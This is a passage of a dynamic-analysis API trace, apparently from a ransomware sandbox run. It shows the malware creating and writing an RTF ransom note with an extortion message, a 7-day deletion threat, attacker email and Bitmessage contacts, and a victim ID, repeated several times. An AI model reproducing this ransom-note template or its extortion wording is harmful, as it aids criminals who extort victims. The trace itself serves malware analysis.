COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.088] WriteFile (in: hFile=0x2e8, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.088] CloseHandle (hObject=0x2e8) returned 1 [0292.088] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\#readme_eman#.rtf")) returned 0xffffffff [0292.088] GetLastError () returned 0x2 [0292.088] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet 